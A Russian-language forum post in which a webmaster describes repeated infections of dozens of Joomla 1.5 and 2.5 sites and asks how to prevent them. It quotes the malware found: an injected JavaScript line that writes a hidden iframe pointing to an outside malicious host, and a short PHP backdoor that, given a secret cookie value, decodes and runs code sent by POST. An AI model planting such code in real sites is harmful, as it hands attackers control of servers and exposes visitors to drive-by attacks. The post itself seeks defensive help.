Долго я держал себя в руках, но все же открою топик на эту тему, тк последнее время начинает конкретно надоедать все это.
У меня несколько десятков сайтов, все на разные таматики, версия Joomla 1.5 и 2.5
За последние два месяца частота заражения сайтов начинает напрягать.
Что есть.
К примеру:
Хостинг.
Пароль на FTP в 18 значений, в перемешку буквы и символы
ОС Mac os - сразу исключаю взлом через FTP (может я не прав - поясните)
Сайт Joomla 2.5.9
Стоит:
Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
Zoo
JCE
Jcomments
RSFirewall
sh404SEF
AcyMailing
Widgetkit
на некоторых стоит VirtueMart
Это список основоного, так сказать.
Что обычно происходит.
Вариант 1:Идет замена .htaccess файла (вписывается код в центр его ил ив конец.) Если права поставить 444, то файл переименовывается, а рядом кладется другой с кодом.
Вариант два 2:Во всех JS файлах добавляется внизу строчка вида (бывают разные):
;document.write('<iframe src="http://dphttz.rebatesrule.net/64e79f785494a6a4c59cc.SBC8o29lvoUtUsbg?default" name="Sandal" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');
Вариант 3:В огромном количестве. практически в каждой паке добавляется файл вида:
b18gr.php
с кодом: <?php echo "#!!#";
Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?
Вариант 4:
Этот вариант работает с вариантом 3 обычно. В некоторых папках создается второй файлик php с рандомным именем, но в нем уже код вида:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>
Иногда на версиях 1.5 можно найти залитый шелл в tmp папку или images, но сейчас вижу это редко.
Вопросы - как вы боритесь с этим? Меня интересует именно предотвращение заражения, а не как вычистить это все. Как чистить и так понятно, а вот как уберечься - не понимаю уже, тк обновления до последних версий не помогают.
Где искать дырку?
Знаю причины в том же JCE были, но сейчас на последних версиях вроде нет.
Была проблема с темой Bluestock для админки, но сейчас это тоже не актуально, вроде как.
Что делать? что делаете вы, как с этим жить?